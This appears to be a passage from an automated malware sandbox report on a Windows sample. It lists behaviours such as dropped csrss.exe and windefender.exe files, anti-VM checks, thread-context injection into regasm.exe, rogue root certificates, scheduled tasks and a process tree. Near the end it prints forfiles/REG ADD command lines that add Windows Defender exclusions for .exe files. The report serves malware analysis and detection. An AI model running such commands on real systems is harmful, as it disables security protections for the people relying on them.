| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS80C4.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS7A00.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\f3yzsIS93qtqfHP3QIaqwe3D.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\f3yzsIS93qtqfHP3QIaqwe3D.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2528 set thread context of 1260 | N/A | C:\Users\Admin\AppData\Local\Temp\627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe |
Checks for VirtualBox DLLs, possible anti-VM trick
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe | N/A |
| File opened (read-only) | \??\VBoxMiniRdrDN | C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe | N/A |
| File created | C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
| File created | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File opened for modification | C:\Windows\windefender.exe | C:\Windows\rss\csrss.exe | N/A |
| File created | C:\Windows\Logs\CBS\CbsPersist_20240328021935.cab | C:\Windows\system32\makecab.exe | N/A |
| File opened for modification | C:\Windows\rss | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe | N/A |
| File created | C:\Windows\rss\csrss.exe | C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe | N/A |
| File created | C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job | C:\Windows\SysWOW64\schtasks.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\u1b0.0.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\u1b0.0.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS7A00.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS7A00.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS80C4.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS80C4.tmp\Install.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-522 = "N. Central Asia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-292 = "Central European Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-252 = "Dateline Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client" | C:\Windows\system32\netsh.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-521 = "N. Central Asia Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" | C:\Windows\system32\netsh.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-581 = "North Asia East Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" | C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)" | C:\Windows\windefender.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = … | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = … | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = … | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = … | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = … | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = … | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = … | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = … | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = … | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = … | C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = … | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = … | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\u1b0.1.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe
"C:\Users\Admin\AppData\Local\Temp\627e36dea92cbdd49fcee34c18a29884010a72b5b004c89df90c19a50303a2b3.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
C:\Users\Admin\Pictures\9WeXljfUZ79vrcuk6JsMXzJp.exe
"C:\Users\Admin\Pictures\9WeXljfUZ79vrcuk6JsMXzJp.exe"
C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe
"C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe"
C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe
"C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe"
C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe
"C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe"
C:\Users\Admin\AppData\Local\Temp\u1b0.0.exe
"C:\Users\Admin\AppData\Local\Temp\u1b0.0.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240328021935.log C:\Windows\Logs\CBS\CbsPersist_20240328021935.cab
C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe
"C:\Users\Admin\Pictures\VNbuS12xUurJgXM3rtXv6uCD.exe"
C:\Users\Admin\Pictures\C69V4HOBgfVrh5iaLMXz8vg9.exe
"C:\Users\Admin\Pictures\C69V4HOBgfVrh5iaLMXz8vg9.exe"
C:\Users\Admin\AppData\Local\Temp\u1b0.1.exe
"C:\Users\Admin\AppData\Local\Temp\u1b0.1.exe"
C:\Users\Admin\AppData\Local\Temp\7zS6E0F.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Pictures\gTpKWIirwoJXbhyuKZKPoyvI.exe
"C:\Users\Admin\Pictures\gTpKWIirwoJXbhyuKZKPoyvI.exe"
C:\Users\Admin\AppData\Local\Temp\7zS7899.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe
"C:\Users\Admin\Pictures\A6jYsiO1FW5u5LjazQ6CsBo4.exe"
C:\Users\Admin\AppData\Local\Temp\7zS7A00.tmp\Install.exe
.\Install.exe /FHdidhi "385118" /S
C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe
"C:\Users\Admin\Pictures\XaSfgFUxnhzcT2cWMqIx13Hz.exe"
C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe
"C:\Users\Admin\Pictures\CBSnoej4iNufmT6hyzvcTZte.exe"
C:\Users\Admin\AppData\Local\Temp\7zS80C4.tmp\Install.exe
.\Install.exe /FHdidhi "385118" /S
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
